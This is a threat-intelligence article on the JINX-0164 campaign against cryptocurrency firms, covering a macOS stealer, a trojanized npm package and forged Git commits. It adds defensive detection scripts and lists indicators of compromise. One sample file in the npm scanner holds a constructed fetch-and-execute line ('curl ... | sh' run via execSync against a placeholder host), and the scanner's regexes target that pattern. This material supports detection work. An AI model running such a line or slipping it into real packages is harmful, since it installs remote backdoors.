A sophisticated threat actor tracked as JINX-0164 is actively targeting cryptocurrency organizations through a multi-stage attack chain that begins with LinkedIn social engineering and culminates in the deployment of custom macOS malware, credential theft, and software supply chain compromise.
Attack Chain: From LinkedIn to Full Infrastructure Compromise
Identified by Wiz Research and Wiz CIRT, JINX-0164 has been active since at least mid-2025 and is financially motivated. The operation begins with a convincing LinkedIn profile that initiates contact under the guise of a business opportunity or job offer, then directs victims to a fake conferencing platform mimicking Microsoft Teams or similar services.
Clicking the meeting link triggers the download of AUDIOFIX, a compiled Python infostealer and backdoor that immediately begins harvesting browser credentials, cryptocurrency wallet extensions, SSH keys, cloud API tokens, and clipboard contents. It talks to its operators over HTTPS, with the payload additionally encrypted using AES-256-CBC, and randomizes its polling interval so that its beaconing does not show the fixed period that simple network detections key on.
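Randomized polling defeats detections that look for an exact period, but bounded jitter still leaves the gaps between connections far more regular than human traffic. The script below is an added example (not code from the original report or from Wiz) that groups outbound connections by destination and flags destinations whose inter-connection gaps have a low coefficient of variation; the events it runs on are constructed, with the C2 domain taken from the indicators section of this article and the jitter window assumed.

```python
import random
import statistics
from collections import defaultdict


def beacon_candidates(events, min_hits=10, max_cv=0.35):
    """events: iterable of (epoch_seconds, destination).

    Groups connections by destination, measures the gaps between successive
    connections and returns destinations whose gaps are regular: coefficient
    of variation (stdev / mean) at or below max_cv. A fixed timer gives cv == 0,
    bounded jitter keeps cv small, and interactive traffic is bursty (cv >> 1).
    Thresholds are assumptions to tune per environment."""
    by_dst = defaultdict(list)
    for ts, dst in events:
        by_dst[dst].append(float(ts))
    hits = {}
    for dst, stamps in by_dst.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            hits[dst] = {
                "connections": len(stamps),
                "mean_gap_s": round(mean, 1),
                "cv": round(cv, 3),
            }
    return hits


def constructed_events():
    """Constructed sample traffic, not captured data: one implant polling its C2
    every 45-90 s (uniform jitter, assumed window) and one host browsing a CDN in
    bursts of three quick requests followed by a long pause."""
    rng = random.Random(7)
    events = []
    t = 1_700_000_000.0
    for _ in range(40):
        events.append((t, "datahub.ink"))
        t += rng.uniform(45, 90)
    t = 1_700_000_000.0
    for _ in range(10):
        for gap in (1, 2, 1, 400):
            events.append((t, "cdn.example"))
            t += gap
    return events


if __name__ == "__main__":
    for dst, stats in beacon_candidates(constructed_events()).items():
        print(dst, stats)
```

Feed it the timestamp and destination columns of proxy or firewall logs for a single host; the jittered implant is reported while the bursty CDN traffic is not. Widening the jitter window raises the cv, so the threshold is a trade-off between the jitter you expect and the false positives you can absorb.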
In one documented case, the full chain, from the first LinkedIn message to complete infrastructure compromise, played out over two weeks. The payload masqueraded as the macOS audio daemon coreaudiod, was dropped to disk as ChromeUpdater, and was registered with launchctl so that it is relaunched after logout or reboot.
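A launchd job registered with launchctl is backed by a plist, and the plist is where a disguise like this one shows through: a system daemon's name sitting in a user-writable path, or a com.apple label pointing at something outside Apple's directories. The script below is an added example (not from the original report or from Wiz) that parses launchd plists and reports such mismatches; the two plists it runs on are constructed, and the list of daemon names worth checking is an assumption, not a complete inventory.

```python
import plistlib
from pathlib import Path, PurePosixPath

# Where legitimately installed launchd programs normally live. An executable in a home
# directory, /tmp or /Users/Shared is not automatically malicious, but it deserves a look.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/", "/Applications/")

# Genuine macOS daemon names that malware borrows, with their real paths.
# Assumption: an illustrative list, not a complete one.
SYSTEM_DAEMONS = {"coreaudiod": "/usr/sbin/coreaudiod", "launchd": "/sbin/launchd"}


def program_of(job: dict) -> str:
    """The executable a launchd job runs: Program wins over ProgramArguments[0]."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else ""


def triage(plist_bytes: bytes) -> list[str]:
    """Return human-readable reasons a launchd job looks like a persistence implant."""
    job = plistlib.loads(plist_bytes)
    prog = program_of(job)
    label = job.get("Label", "")
    if not prog:
        return ["job specifies no program"]
    findings = []
    if not prog.startswith(TRUSTED_PREFIXES):
        findings.append(f"program outside trusted directories: {prog}")
    name = PurePosixPath(prog).name
    if name in SYSTEM_DAEMONS and prog != SYSTEM_DAEMONS[name]:
        findings.append(f"system daemon name {name!r} at unexpected path {prog}")
    if label.startswith("com.apple.") and not prog.startswith(("/System/", "/usr/", "/Library/Apple/")):
        findings.append(f"label {label!r} claims to be Apple but runs {prog}")
    if job.get("RunAtLoad") and job.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive: starts at login/boot and is restarted if killed")
    return findings


def scan_host() -> dict[str, list[str]]:
    """Triage every plist in the standard launchd directories on the local Mac."""
    dirs = [Path("/Library/LaunchAgents"), Path("/Library/LaunchDaemons"),
            Path.home() / "Library/LaunchAgents"]
    results = {}
    for d in dirs:
        if not d.is_dir():
            continue
        for p in d.glob("*.plist"):
            try:
                hits = triage(p.read_bytes())
            except Exception as exc:  # a plist launchd cannot parse is itself worth a look
                hits = [f"unparseable: {exc}"]
            if hits:
                results[str(p)] = hits
    return results


# Constructed sample plists; neither is a real artifact from the campaign.
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.audio.coreaudiod</string>
  <key>Program</key><string>/usr/sbin/coreaudiod</string>
  <key>KeepAlive</key><true/>
</dict></plist>"""

SUSPECT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.ChromeUpdater</string>
  <key>ProgramArguments</key><array>
    <string>/Users/dev/Library/Application Support/ChromeUpdater/coreaudiod</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    print("benign :", triage(BENIGN))
    print("suspect:", triage(SUSPECT))
    for path, hits in scan_host().items():
        print(path, hits)
```

Run it on a suspect Mac (or over plists collected from one) and compare against `launchctl list` for jobs that are loaded but whose plist is not in the standard directories. The real coreaudiod lives at /usr/sbin/coreaudiod; any copy elsewhere is the tell this campaign relied on nobody checking.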
Supply Chain Sabotage Through Trojanized npm Package
On April 7, 2026, JINX-0164 escalated by compromising version 4.9.1 of @velora-dex/sdk, a widely used cryptocurrency npm package. The group appended code that downloaded and executed a shell script whenever any project imported the package, delivering MINIRAT, a lightweight Go backdoor that gives the operators persistent remote access and command execution. Because the payload fired on import rather than from an install hook, disabling npm lifecycle scripts would not have stopped it; only pinning to a known-good version and inspecting what was actually published would.
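Two checks follow from that description: is the known-bad version present in the lockfile, and does a package's entry point spawn a shell that fetches and runs something at load time. The script below is an added example (not code from the report, from Wiz or from the package's maintainers) that implements both, plus the install-script check that would have missed this particular payload. The package name and version are the page's own; the lockfile, the trojaned index.js and the download URL are constructed, and the regexes are a heuristic, not a parser.

```python
import json
import re

# The only specific the report gives: the compromised package and version.
KNOWN_BAD = {("@velora-dex/sdk", "4.9.1")}

# Heuristics for "spawn a shell, fetch a script, run it". Assumption: tuned to the
# reported behaviour; a production scanner would walk the JS AST instead.
SPAWNER = re.compile(r"\b(child_process|execSync|spawnSync|exec|spawn)\b")
FETCH_EXEC = re.compile(r"\b(curl|wget)\b[^\n]*\|\s*(sh|bash|zsh)\b|\b(sh|bash|zsh)\s+-c\b")
OBFUSCATION = re.compile(r"""Buffer\.from\([^)]*['"]base64['"]\)|\beval\(|\bFunction\(""")


def check_lock(lock: dict) -> list[str]:
    """Known-bad versions in a package-lock.json (lockfileVersion 2/3 'packages' map)."""
    hits = []
    for path, meta in lock.get("packages", {}).items():
        if not path:  # "" is the root project itself
            continue
        name = path.rsplit("node_modules/", 1)[-1]
        if (name, meta.get("version")) in KNOWN_BAD:
            hits.append(f"{name}@{meta['version']} at {path}")
    return hits


def check_scripts(pkg: dict) -> list[str]:
    """Lifecycle scripts that download-and-run. The reported payload ran on import,
    not from an install hook, so an empty result here proves nothing on its own."""
    return [f"{hook}: {cmd}" for hook, cmd in pkg.get("scripts", {}).items()
            if hook in ("preinstall", "install", "postinstall", "prepare")
            and FETCH_EXEC.search(cmd)]


def check_entry_source(src: str) -> list[str]:
    """Module source that spawns a shell to fetch and execute remote content on load."""
    findings = []
    if SPAWNER.search(src) and FETCH_EXEC.search(src):
        findings.append("module spawns a shell that fetches and executes remote content on import")
    if OBFUSCATION.search(src):
        findings.append("base64 decoding or eval in module source")
    return findings


# Constructed samples. The trojaned index.js is illustrative, not the real payload.
LOCK = json.loads("""{
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "trading-bot", "dependencies": {"@velora-dex/sdk": "^4.9.0"}},
    "node_modules/@velora-dex/sdk": {"version": "4.9.1"}
  }
}""")

CLEAN_INDEX = 'module.exports = require("./lib/sdk");\n'
TROJANED_INDEX = CLEAN_INDEX + (
    'const { execSync } = require("child_process");\n'
    'try { execSync("curl -fsSL https://payload.invalid/setup.sh | sh", {stdio: "ignore"}); } catch (e) {}\n'
)

if __name__ == "__main__":
    print(check_lock(LOCK))
    print(check_entry_source(CLEAN_INDEX))
    print(check_entry_source(TROJANED_INDEX))
```

Point `check_entry_source` at the `main` file of each package under node_modules (or at the extracted tarball from `npm pack` before you ever install it), and run `check_lock` in CI against the committed lockfile so a bump to the bad version fails the build rather than landing on a developer's machine.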
The threat actor also forged Git commit metadata (the author and committer fields, which any pusher can set to anything) to impersonate legitimate developers and pushed malicious code directly into internal repositories. Using nord-stream, an open-source tool for extracting secrets from CI/CD pipelines, the attackers exfiltrated pipeline credentials and spread the infected code to every developer who pulled from those branches.
To further obfuscate their activity, JINX-0164 routed network traffic through commercial VPN services including ExpressVPN, Astrill VPN, and Mullvad VPN, complicating attribution efforts.
Defensive Recommendations and Indicators of Compromise
Organizations should deploy endpoint detection and response solutions and enable audit logging across all cloud platforms and version control systems. Security teams must monitor for unverified commits in GitHub, unexpected VPN usage, and anomalous workflow activity in CI/CD pipelines.
Enabling GitHub Vigilant Mode helps here: it marks every commit attributed to the account that lacks a verified signature as Unverified, so a commit with a forged author field but no valid signature stands out. Teams should also flag any use of nord-stream and scrutinize new package publications originating from unfamiliar IP addresses.
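The forged-metadata technique from the attack narrative and the Vigilant Mode advice above come down to the same check, which you can run yourself on a self-hosted repository or before merging a branch: author and committer fields prove nothing, a good signature from a key you already trust does. The script below is an added example (not from the report or from Wiz) that reads `git log` with a machine-friendly format and flags unsigned commits, commits signed by unvetted keys, author/committer mismatches and out-of-domain authors. The sample log lines, names, emails, domain and key ids are constructed.

```python
import subprocess

# Unit separator (0x1f) between fields so names with spaces or commas parse safely.
FORMAT = "%H%x1f%an%x1f%ae%x1f%cn%x1f%ce%x1f%G?%x1f%GK"
# %G? : G good signature, B bad, U good but untrusted key, X/Y expired,
#       R revoked, E cannot be checked (key missing), N no signature at all.


def git_log_lines(repo: str, rev_range: str) -> list[str]:
    """Run git log with FORMAT over rev_range (e.g. 'origin/main..HEAD')."""
    out = subprocess.run(
        ["git", "-C", repo, "log", f"--format={FORMAT}", rev_range],
        capture_output=True, text=True, check=True,
    ).stdout
    return out.splitlines()


def review(lines, org_domains, trusted_key_ids):
    """Return [(short_sha, [reasons])] for commits that fail identity checks.

    Author/committer fields are whatever the pusher put in git config, so a
    commit that looks like a colleague's is not evidence of anything; only a
    good signature from a key on the allow-list is."""
    findings = []
    for line in lines:
        sha, an, ae, cn, ce, sig, key = line.split("\x1f")
        reasons = []
        if sig != "G":
            reasons.append(f"signature status {sig} (not a good signature)")
        elif key not in trusted_key_ids:
            reasons.append(f"good signature but from unknown key {key}")
        if (an, ae) != (cn, ce):
            reasons.append(f"author {an} <{ae}> differs from committer {cn} <{ce}>")
        if not any(ae.endswith("@" + d) for d in org_domains):
            reasons.append(f"author email outside org domains: {ae}")
        if reasons:
            findings.append((sha[:12], reasons))
    return findings


# Constructed sample git log output; shas, people and key ids are made up.
SAMPLE = [
    "\x1f".join(["a" * 40, "Jane Doe", "jane@corp.example",
                 "Jane Doe", "jane@corp.example", "G", "0123456789ABCDEF"]),
    # forged metadata: looks exactly like Jane, but nothing is signed
    "\x1f".join(["b" * 40, "Jane Doe", "jane@corp.example",
                 "Jane Doe", "jane@corp.example", "N", ""]),
    # signed, but by a key nobody vetted, and committed under a different identity
    "\x1f".join(["c" * 40, "Jane Doe", "jane@corp.example",
                 "Release Bot", "release@mailbox.example", "G", "FEDCBA9876543210"]),
]

if __name__ == "__main__":
    for sha, reasons in review(SAMPLE, ["corp.example"], {"0123456789ABCDEF"}):
        print(sha, *reasons, sep="\n    ")
```

In a pre-merge job, `review(git_log_lines(".", "origin/main..HEAD"), ORG_DOMAINS, TRUSTED_KEYS)` with a non-empty result fails the build. Keep the trusted-key list in the repository itself and require it to be signed too, or the allow-list becomes the next thing an attacker with push access edits.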
Key indicators of compromise include SHA-256 hashes for the AUDIOFIX and MINIRAT variants (listed in the original report), command-and-control domains such as datahub[.]ink and cloud-sync[.]online, and payload delivery domains including apple[.]driver-store[.]com and driver-updater[.]net.
What This Means for the Industry
JINX-0164 represents a dangerous evolution in targeted macOS malware campaigns, combining sophisticated social engineering with supply chain sabotage in a single, seamless operation. The group’s ability to compromise both individual developers and shared infrastructure underscores a critical reality: the software development pipeline itself has become the attack surface. For cryptocurrency organizations and the broader tech sector, trust in identity alone is no longer sufficient — every link, every package, and every commit must be treated as a potential vector.
— Originally reported by Cyber Security News. Adapted and republished with editorial context for MacThreat.